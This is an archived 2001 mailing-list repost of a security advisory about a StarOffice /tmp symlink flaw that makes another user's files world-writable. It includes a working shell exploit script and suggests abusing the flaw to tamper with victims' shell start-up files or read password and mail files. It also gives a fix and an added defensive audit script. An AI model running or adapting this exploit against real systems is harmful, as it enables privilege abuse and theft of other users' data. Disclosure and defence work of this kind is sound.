[LINUX:25640] Fwd: HeliSec: StarOffice symlink exploit

---------


From: Murat Koc (murat.koc@frontsite.de)
Date: Tue 20 Feb 2001 - 21:58:35 EET


-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

- - = Helios Security and Administration = -

        Hi everyone,

        StarOffice creates a temporary directory in /tmp called soffice.tmp,
with permissions 0777. Into this directory other temporary files are created,
with the format: svZZZZ.tmp, where ZZZZ is a four- or five-digit number.

        StarOffice not only creates the /tmp/soffice.tmp directory with
permissions 0777, but also chmod()s it sometimes when StarOffice is running
afterwards. If any user creates a symbolic link from /tmp/soffice.tmp to any
file owned by another user, when this last user runs StarOffice the target of
the link will become 0777. So, if the directory of the target file is
accessible by the malicious user that created the symlink, he can do
whatever he wants with the file. A few ways to exploit this are:

        - to modify shell start-up files (such as .profile, .bashrc, .cshrc,
etc.) to execute whatever the hacker wants next time the victim logs in.
        - to gain access to private files with sensitive information, such as
password files, mail spool files, etc.
        - a lot more evil acts.

        StarOffice gives no error message or the like when it changes the
permissions of the target file, so from the victim's point of view all is
going right ;-)

        Requirements:

        - Access to the target file's directory is needed.
        - The target file must NOT be executable.

        Fix:

        One way to fix the problem is to create a directory inside your
home directory which is inaccessible to anyone but yourself (permissions
 700), called tmp. Then insert an entry in your login start-up file to set
 the $TMP environment variable to $HOME/tmp, so it will direct StarOffice to
 use your temporary directory, rather than the system /tmp. Something like
 this (in bash):

        [wushu@JeT-Li]$ TMP=$HOME/tmp ; export TMP
        (not permanent)
        or modify the .bash_profile adding TMP=$HOME/tmp and including this
variable in the export.

        Here is the exploit code. To make sure that this will work, first run
StarOffice, so you will become owner of /tmp/soffice.tmp, which is necessary
to remove it and create the symlink.

#!/bin/sh
SOFFICE="/tmp/soffice.tmp"
TARGETFILE=$1

if [ $# != 1 ]; then
    echo
    echo " - = HeliSec - Helios Security and Administration = -"
    echo "Usage : "
    echo "./soffice.sh <file>"
    echo "Set 0777 permissions to any file (access to the directory of the file needed)"
    echo " JeT Li -The Wushu Master-"
    exit
fi

if [ ! -f ${TARGETFILE} ]; then
    echo "Target file must exist"
    exit
fi

rm -rf ${SOFFICE}
ln -sn ${TARGETFILE} ${SOFFICE}
echo
echo "Symbolik link done ..."
echo

perl -e '$a=`ps aux | grep office`; $a =~ /soffice\.bin/ ?
print "StarOffice is running on this machine ... wait a minutes and
the permissions will have been set.\n" :
print "StarOffice is not running on this machine ...you may wait for
the signal (not recommended) or CTRL+C the program; when the user
run StarOffice the permissions will be set automaticly\n";'

while :
do
if [ `ls -al ${TARGETFILE} | awk '{printf $1}'` = "-rwxrwxrwx" ]; then
    echo
    echo "Permissions set succesfully ... good luck ;-)"
    echo
    echo "- = HeliSec - Helios Security and Administration = -"
    echo " JeT Li -The Wushu Master-"
    exit
fi
done

        Cheers,

                                        JeT Li -The Wushu Master-

                                                                MURAT KOC
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
-----END PGP SIGNATURE-----
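
The fix described in the message above, together with a check for the condition it warns about, written as an added example that is not part of the original post or of StarOffice. The function names audit_tmp_entry and setup_private_tmp are hypothetical, and the paths in the usage comment are the ones the message names.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# audit_tmp_entry PATH: classify a temp path such as /tmp/soffice.tmp.
# Prints a verdict and returns:
#   0  absent, or owned by us and not world-writable
#   1  symbolic link (a chmod() by the application would hit the link target)
#   2  owned by another user
#   3  world-writable (mode 0777 as described in the post)
audit_tmp_entry() {
    p=$1
    # Test -L first: -e follows links and is false for a dangling one.
    if [ -L "$p" ]; then
        echo "SYMLINK: $p -> $(readlink "$p")"; return 1
    fi
    [ -e "$p" ] || { echo "OK: $p absent"; return 0; }
    [ -O "$p" ] || { echo "FOREIGN: $p is not owned by $(id -un)"; return 2; }
    # find prints the path only if the other-write bit is set.
    if [ -n "$(find "$p" -prune -perm -0002 2>/dev/null)" ]; then
        echo "WORLD-WRITABLE: $p"; return 3
    fi
    echo "OK: $p"; return 0
}

# setup_private_tmp [DIR]: the post's fix. Create DIR (default $HOME/tmp)
# with mode 700, refusing a symlink or a directory owned by someone else.
# Prints DIR on success so the caller can export it as TMP.
setup_private_tmp() {
    d=${1:-$HOME/tmp}
    if [ -L "$d" ]; then echo "refusing symlink: $d" >&2; return 1; fi
    if [ ! -d "$d" ]; then
        (umask 077 && mkdir "$d") || return 1
    fi
    [ -O "$d" ] || { echo "not owned by you: $d" >&2; return 1; }
    chmod 700 "$d" || return 1
    echo "$d"
}

# Usage in a login start-up file (commented out so sourcing has no effect):
#   TMP=$(setup_private_tmp) && export TMP
#   audit_tmp_entry /tmp/soffice.tmp
```

Running audit_tmp_entry before starting StarOffice shows whether the shared path has been replaced by a link; the private TMP directory removes the dependency on the shared path altogether.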

 